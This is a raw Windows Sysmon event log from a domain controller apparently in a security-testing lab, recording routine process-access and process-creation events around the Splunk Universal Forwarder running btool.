13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8EE3-6005-B700-00000000A301}6641004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8EE3-6005-B600-00000000A301}28202816C:\Windows\system32\cmd.exe{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.658{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 